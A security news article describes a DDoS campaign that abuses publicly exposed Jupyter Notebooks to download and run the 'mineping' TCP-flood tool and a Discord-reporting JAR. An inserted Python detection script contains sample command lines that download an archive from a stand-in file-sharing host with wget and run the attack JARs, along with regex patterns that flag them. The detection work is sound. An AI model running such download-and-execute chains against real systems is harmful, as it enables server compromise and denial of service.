Stratos Ally

Jupyter Notebook Vulnerabilities Targeted Using Modified Minecraft DDoS Software 

StratosAlly

Security experts have found a DDoS attack campaign that targets vulnerable Jupyter Notebooks. Aqua, a cloud security firm, has codenamed this operation “Panamorfi”. 

The threat actors use a Java-based tool known as “mineping” to carry out TCP flood DDoS attacks. This tool was first made for Minecraft game servers. To attack, they take advantage of Jupyter Notebook instances that anyone can access on the internet. These attackers use the compromised instances to get a ZIP file from a file-sharing platform called Filebin using the “wget” command. 

This ZIP archive has two Java archive (JAR) files: conn.jar and mineping.jar. Conn.jar sets up a connection to a Discord channel while mineping.jar carries out the actual DDoS attack. 
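Detection logic for the chain described above, added here as an example and not taken from Aqua's research or this article's source: it flags a download from a Filebin host and a `java -jar` run of conn.jar or mineping.jar when they descend from a Jupyter process. The event format, field names, the `filebin.example` host, the Jupyter process-name patterns, and the extension from `wget` to `curl` are assumptions.

```python
import json
import re

# Constructed process-exec events (not real telemetry); field names and hosts are assumed.
SAMPLE_EVENTS = """\
{"pid": 100, "ppid": 1, "cmd": "python3 /usr/local/bin/jupyter-notebook --ip=0.0.0.0"}
{"pid": 210, "ppid": 100, "cmd": "python3 -m ipykernel_launcher -f kernel-1.json"}
{"pid": 300, "ppid": 210, "cmd": "/bin/sh -c wget https://filebin.example/PLACEHOLDER/a.zip"}
{"pid": 301, "ppid": 300, "cmd": "wget https://filebin.example/PLACEHOLDER/a.zip"}
{"pid": 320, "ppid": 210, "cmd": "java -jar conn.jar"}
{"pid": 321, "ppid": 210, "cmd": "java -jar mineping.jar"}
{"pid": 400, "ppid": 1, "cmd": "wget https://mirror.example/pkg.tar.gz"}
{"pid": 500, "ppid": 210, "cmd": "python3 train.py"}
"""

JUPYTER = re.compile(r"jupyter-(notebook|lab|server)|ipykernel")
DOWNLOAD = re.compile(r"\b(wget|curl)\b.*filebin", re.I)
JAR_RUN = re.compile(r"\bjava\b.*-jar\s+\S*(conn|mineping)\.jar\b")

def jupyter_root(pid, procs):
    """Return the topmost Jupyter ancestor of pid, or None if there is none."""
    root, seen = None, set()
    cur = procs.get(pid, {}).get("ppid")
    while cur in procs and cur not in seen:  # seen guards against PID-reuse loops
        seen.add(cur)
        if JUPYTER.search(procs[cur]["cmd"]):
            root = cur
        cur = procs[cur]["ppid"]
    return root

def detect(lines):
    """Flag download and JAR-execution stages that descend from a Jupyter process."""
    events = [json.loads(l) for l in lines if l.strip()]
    procs = {e["pid"]: e for e in events}
    hits = {}  # Jupyter root pid -> {"download": [pids], "jar": [pids]}
    for e in events:
        stage = "download" if DOWNLOAD.search(e["cmd"]) else \
                "jar" if JAR_RUN.search(e["cmd"]) else None
        root = jupyter_root(e["pid"], procs) if stage else None
        if root is not None:
            hits.setdefault(root, {"download": [], "jar": []})[stage].append(e["pid"])
    alerts = []
    for root, h in sorted(hits.items()):
        # Both stages under one server match the chain described; one alone is weaker.
        severity = "high" if h["download"] and h["jar"] else "medium"
        alerts.append({"jupyter_pid": root, "severity": severity,
                       "pids": sorted(h["download"] + h["jar"])})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS.splitlines()):
        print(alert)
```

The same `wget` run outside any Jupyter process tree (pid 400 in the sample) is not flagged, which keeps routine package downloads out of the alert stream.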

Aqua researcher Assaf Morag explained that the attack tries to overload the target server’s resources by flooding it with TCP connection requests. The Discord channel then receives reports on the results of these attacks. 

Experts have connected the campaign to a threat actor known as “yawixooo”. This actor’s GitHub profile includes a public repository with a Minecraft server properties file. 

Keep in mind that this isn’t the only case involving Jupyter Notebooks. In late 2023, another group called “Qubitstrike” was caught using Jupyter Notebooks to mine cryptocurrency and break into cloud environments. 

This latest attack shows the constant security threats tied to how Jupyter Notebook instances are set up and exposed. It stresses the need to boost security in cloud-based development spaces.
